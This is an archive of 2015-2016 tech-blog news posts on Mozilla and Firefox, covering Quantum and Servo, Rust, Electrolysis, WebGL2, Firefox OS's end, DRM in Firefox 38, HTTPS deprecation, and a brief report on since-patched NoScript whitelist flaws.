Mozilla Unveils Quantum Project

Subject: General Tech | October 30, 2016 - 01:09 AM |
Tagged: mozilla, servo, gecko, firefox

One of the big announcements at Mozilla Summit 2013, despite Firefox OS being the focus of the event, was their research (with Samsung) into a new rendering engine, Servo. Rendering HTML5 is horrifically complex, so creating a new rendering engine from scratch is a big “nope!” for basically all organizations. Mozilla saw this as a big potential, because current engines are very difficult to scale to multiple cores, so they went in to this as a no-assumptions experiment.

mozilla-architecture.jpg

At the time, they didn't know whether Servo would be built up into a full rendering engine, or whether it would be picked apart and pulled back into their current engine, Gecko. Mozilla has now unveiled Quantum, and the first sentence of its MozillaWiki entry is “Quantum is not a new web browser.” They go on to say that they will be “building on the Gecko engine as a solid foundation”. So it seems pretty clear that, like they've recently done with their media file parser in Firefox 48.

While this will likely not have the major impact that “boom, new engine” would, in terms of performance, this piece-wise method should be quicker than bulking up Servo. Mozilla expects that big changes will begin to land next year.

Source: Mozilla

About the "Firefox Is Eating Your SSD" Story

Subject: Storage | October 5, 2016 - 07:57 PM |
Tagged: ssd, mozilla, google, firefox, endurance, chrome

A couple of weeks ago, I saw a post pop up on Twitter a few times about Firefox performing excessive writes to SSDs, which total up to 32GBs in a single day. The author attributes it mostly to a fast-updating session restore feature, although cookies were also resource hogs in their findings. In an update, they also tested Google Chrome, which, itself, clocked in over 24GB of writes in a day.

mozilla-2016-donothurt.png

This, of course, seemed weird to me. I would have thought that at least one browser vendor might notice an issue like this. Still, I passed the link to Allyn because he would be much more capable in terms of being able to replicate these results. In our internal chat at the time, he was less skeptical than I was. I've since followed up with him, and he said that his initial results “wasn't nearly as bad as their case”. He'll apparently elaborate on tonight's podcast, and I'll update this post with his findings.

Mozilla Discontinues Firefox OS for All Devices

Subject: General Tech, Mobile | September 29, 2016 - 02:15 AM |
Tagged: mozilla, Firefox OS, firefox

Update: There has been a little confusion. The web browser, Firefox, is still going strong. In fact, they're focusing their engineering efforts more on it, by cutting back on these secondary projects.

Less than a year after their decision to stop developing and selling smartphones through carriers, Mozilla has decided to end all commercial development of Firefox OS. Releases after Firefox OS 2.6 will be handled by third parties, such as Panasonic, should they wish to continue using it for their smart TV platform. Further, source code for the underlying operating system, Boot-to-Gecko (B2G), will be removed from their repository, mozilla-central, so it doesn't hinder development of their other products.

Mozilla_Foundation_201x_logo.png

Obviously, this is quite disappointing from a platform standpoint. Many applications, especially for mobile and similar devices, can be created in Web standards. At this point, we usually get comments about how web browsers shouldn't be app platforms, and that JavaScript is too inefficient. The thing is, Web is about the best, ubiquitous platform we have, and it will only get better with initiatives such as WebAssembly. Also, native applications don't necessarily perform better than Web-based ones, especially if the latter are packaged standalone (versus sharing resources with other tabs in a browser).

Regardless, Mozilla needs to consider their long-term financial stability, and throwing resources at Firefox OS apparently doesn't return enough value for them, both directly and for its impact on society.

Source: Mozilla

Mozilla Launches Firefox 49

Subject: General Tech | September 20, 2016 - 04:51 PM |
Tagged: mozilla, firefox

While it was originally scheduled for last week, some last-minute issues preventing the software non-profit organization from releasing it until today. Also, for some reason, Firefox for Android doesn't want to update from within itself, but triggering an update from the Google Play store works. This might be temporary and/or happens with every Firefox for Android update; I'm new to this platform.

Mozilla_Firefox_logo_2013.png

This version is expected to expand their multi-process support, which separates UI updates from site updates. Typically, Firefox disables the feature with add-ons, because they are given the tools to make decoupling these two spaces... glitchy. Under typical situations, JavaScript and other tasks that run in the page shouldn't affect the browser's interface. You can see how this could be a problem if, for instance, an add-on loops between tasks on both at the same time. As such, Mozilla is pulling access to a few APIs when multi-process is enabled.

With Firefox 49, VentureBeat is reporting that Mozilla is allowing a “small initial set of compatible add-ons” to be enabled alongside multi-process. If you don't have any non-compatible add-ons installed, then you should see Multiprocess Windows enabled in about:support. Otherwise, it will be disabled and you won't see any difference.

Interestingly, Mozilla is promoting "Refresh Firefox" at their site if you have the latest version. This basically cleans all the add-ons out of your user profile, but maintains browsing history, bookmarks, and the like. It might have been around for a while, but, if it's new, it times nicely with the multi-process rollout. On top of cleaning out old, crufty add-ons, a user should see a bigger jump when Mozilla's enhancements are (I'm guessing) enabled.

Mozilla has also changed a few things here and there, too. While many of our readers will probably have hardware acceleration for video, they have just added in SSSE3 enhancements if GPU support isn't available. I'm not sure all of the use cases for this, but I'd expect it would help in virtualized environments and certain, older PCs (ex: Intel Atom and Via Nano). I'm just speculating, though.

Source: Mozilla

Mozilla to Publish First Rust-based Module in Firefox 48

Subject: General Tech | July 16, 2016 - 05:41 PM |
Tagged: mozilla, Rust, firefox

Mozilla has been working on the Rust language for several years now. It is designed to be extremely fast, memory-safe, and easy to parallelize on multi-core processors, doing so by having a compiler that's not afraid to tell you “Nope.” Mozilla (and others, like Samsung) want a language with those characteristics because it will make an extremely fast, yet secure, web browser (although there's a lot of single-threaded design choices tangled in the Web specifications).

mozilla-rust.png

The first example will arrive next month for Windows, though (64-bit OSX and Linux already had it). Firefox 48 will replace a small portion of the code, originally written in C++, with a Rust-based equivalent. The affected component parses media files, getting values like track id, duration, resolution, and so forth. Because it's written in Rust, this ingestion should be resilient to memory-based vulnerabilities.

This probably will not be noticeable to end-users, but it's a few thousand less lines of code that Mozilla should need to worry about hijacking the browser. Mozilla is also planning on bringing URL parsing to Rust, and has already done so with Servo. You would think that the C++ code has been battle-hardened by now, but, I mean, 15-year-old open-source bugs do exist, hiding in plain sight.

Source: Mozilla

Mozilla Will Begin Electrolysis with Firefox 48

Subject: General Tech | June 9, 2016 - 01:08 AM |
Tagged: mozilla, firefox

Electrolysis (e10s) is Mozilla's codename for their multi-process initiative in Firefox. The main goal of this is to separate the content of the website from the user interface. This means that, if a site has long-running JavaScript or layout, Firefox will not lock up. This seems like a simple idea, except that it undoes over a decade of assumptions that were made during Firefox's development. Imagine, for instance, that you have an extensions which modifies both the browser UI as well as the page content -- that's a single script that needs to be run across multiple threads. Whoops!

Mozilla_Firefox_logo_2013.png

This roll-out won't necessarily be immediate, though. You can install Firefox 48 and, only some weeks later, get Electrolysis turned on retroactively. They are starting with about 1% of eligible users, which will ramp up to all eligible users over time or even be disabled if alarm bells start to ring.

Speaking of eligible users, there are quite a few conditions that will prevent you from getting Electrolysis. Namely, if you use extensions (it's unclear if they're talking about all extensions, or just ones that use certain APIs) then you will be kept on single-process. They don't specify why, but it could very well be the situation that I mentioned in the first paragraph.

Firefox 48 is scheduled to be released in six weeks (the first week of August).

WebGL2 Is On Its Way

Subject: General Tech | December 31, 2015 - 10:25 PM |
Tagged: webgl2, webgl, mozilla, firefox

The Khronos Group created WebGL to bring a GPU-accelerated platform to web browsers. With a few minor differences, it is basically JavaScript bindings for OpenGL ES 2.0. It also created a few standards in JavaScript itself to support things like raw buffers of data that could be assigned types in an unmanaged way. Basically every latest-version web browser supports it these days, and we're starting to see it used in interesting ways.

webgl2-2015-particles.jpg

The next step is WebGL2. OpenGL ES 3.0 adds a bunch of new features that are sorely needed for modern games and applications. For instance, it allows drawing to multiple render targets, which is very useful for virtual cameras in video games (although the original WebGL software could access this as an optional extension when supported). The addition of “Uniform Buffer Objects” is a better example. This allows you to store a bunch of data, like view transformation matrices, as a single buffer that can be bound to multiple applications, rather than binding them one at a time to every draw that needs them.

It's hard to describe, but demos speak a thousand words.

The news today is that Mozilla Nightly now ships with WebGL2 enabled by default. It was previously hidden, disabled by default, behind an option in the browser. This doesn't seem like a big deal, but one of the largest hurdles to WebGL2 is how the browsers actually implement it. The shading language in WebGL was simple enough that most browsers convert it to DirectX HLSL on Windows. This is said to have the added advantage of obfuscating the ability to write malicious code, since developers never directly writes what's executed. GLSL in OpenGL ES 3.0 is much more difficult. I'm not sure whether the browsers will begin to trust OpenGL ES 3.0 drivers directly, or if they finally updated the GLSL translator, but supported implementations means that something was fixed.

Unfortunately, OpenGL compute shaders are not supported in WebGL2. That said, the biggest hurdle is, again, to get WebGL2 working at all. From my talks with browser vendors over the last year or so, it sounds like features (including compute shaders) should start flying in easily once this hurdle is cleared. From there, GPGPU in a website should be much more straightforward.

Almost NoScript Exploits Whitelist Vulnerabilities

Subject: General Tech | July 6, 2015 - 07:01 AM |
Tagged: noscript, javascript, firefox

I do not really believe in disabling JavaScript, although the ability to control or halt execution would be nice, but you can use an extension to remove it entirely if you want. I say this because the upcoming story talks about vulnerabilities in the NoScript extension, which locks down JavaScript and other, non-static content. By “vulnerabilities”, we mean the ability to execute JavaScript, which every major browser vendor defaults on because they consider it safe for their users on its own.

NoScript.png

This is like a five-year-old figuring out how to unlock a fireworks case full of paper crackers.

Regardless, there are two vulnerabilities, both of which have already been updated. Both of them take advantage of the whitelist functionality to ignore malicious code. By default, NoScript trusts a handful of domains, because blocking every script ever would break too much of the internet.

The first problem is that the whitelist has a little cruft, some of which including domain names that are useless, and even some that have expired into the public domain for sale. To prove a point, Matthew Bryant purchased zendcdn.net and used it to serve his own JavaScript. The second problem is similar, but slightly different. Rather than finding a domain that expired, it found some whitelist entries, such as googleapis.com, that had sub-domains, storage.googleapis.com, which is a service that accepts untrusted user scripts (it is part of Google's Cloud Platform).

Again, even though JavaScript is about as secure as you can get in an executable language, you should be allowed to control what executes on your machine. As stated, NoScript has already addressed these issues in a recent update.

Firefox 38 Launches with (and also without) DRM Support

Subject: General Tech | May 13, 2015 - 05:06 PM |
Tagged: mozilla, firefox, DRM

Mozilla has just released Firefox 38. With it comes the controversial Adobe Primetime DRM implementation through the W3C's Encrypted Media Extensions (EME). Or, maybe not. If you upgrade the browser through one of the default channels, the Adobe Primetime Content Decryption Module will appear in the Plugins tab of your Add-ons manager on Windows Vista or later (but it might take a few minutes after the upgrade).

Mozilla_Firefox_logo_2013.png

Alternatively, you can use Mozilla's EME-free installer for Firefox and avoid it altogether.

I have mentioned my concerns about DRM in the past. EME does not particularly bother me, because it is just a plugin architecture, but the fundamental concept does. Simply put, copy protection does very little good and a whole lot of bad. If your movie is leaked before it is legally available in consumer's hands, as it regularly does, then what do you expect to accomplish after the fact? It takes one instance to be copied infinitely, and that often comes from the film company's own supply chain, not their customers. Moreover, it is found to reduce sales and hurt customer experience (above and beyond the valid ideological concerns).

Beyond the DRM inclusion, several new features were added. One of the more interesting ones is BroadcastChannel API. This standard allows a web application to share data between “contexts” that have the same “user agent and origin”. In other words, it must be on the same browser and using the same app (even secondary instances of it). This will allow sites to do multi-monitor split screen, which is useful for games and utilities.

WebRTC has also been upgraded with multistream and renegotiation. Even though the general public thinks of WebRTC as a webcam and voice chat standard, it actually allows arbitrary data channels. For example, “BananaBread” is a first person shooter that used WebRTC to synchronize multiplayer state. Character and projectile position is very much not webcam or audio data, but WebRTC doesn't care.

Firefox 38 launched on May 12th with an optional, DRM-incompatible build.

Source: Mozilla

Forcing HTTPS Is Being Discussed

Subject: General Tech | April 14, 2015 - 08:08 PM |
Tagged: mozilla, http, https, firefox

On the Mozilla Dev-Platform Newsgroup, hosted at Google Groups, a proposal to deprecate insecure HTTP is being discussed. The idea is that HTTPS needs to be adopted and organizations will not do it without being pushed. The plan is to get browser vendors to refuse activating new features, and eventually disable old features, unless the site is loaded as a “privileged context”.

22-mozilla-2.jpg

This has sparked a debate, which was the whole point of course, about how secure do we want the Web to be. What features should we retroactively disable unless it is done through HTTPS? Things that access your webcam and microphone? Things that write to your hard drive? Then there is the question of how to handle self-signed certificates to get encryption without verification, and so forth.

Note: Websites cannot access or create files on your hard drive, but standards like localStorage and IndexedDB allow websites to have their own spaces for persistence. This is to allow, for instance, a 3D game to cache textures (and so forth) so you don't need to download them every time.

Personally, this concerns me greatly. I started helping Mozilla a couple of years ago, a few weeks after I saw Microsoft's Windows 8 developer certification program. I do not like the thought of someone being able to stifle creation and expression, and the web was looking like it might be the last bastion of unrestricted development for the general public.

In the original Windows Store requirements, no browser could exist unless it was a skin of Trident. This meant that, if a site didn't work in Internet Explorer, it didn't exist. If you didn't want to play by their rules? Your app didn't get signed and your developer certificate could even be revoked by Microsoft, or someone with authority over them. You could imagine the problems a LGBT-focused developer might have in certain countries, even if Microsoft likes their creations.

This is obviously not as bad as that. In the Windows Store case, there was one authority whereas HTTPS can be authenticated by numerous providers. Also, if self-signed certificates are deemed “secure enough”, it would likely avoid the problem. You would not need to ask one of a list of authorities permission to exist; you could secure the connection yourself. Of course, that is a barrier of skill for many, and that is its own concern.

So we'll see, but I hope that Mozilla will take these concerns as a top priority in their decisions.

Source: Mozilla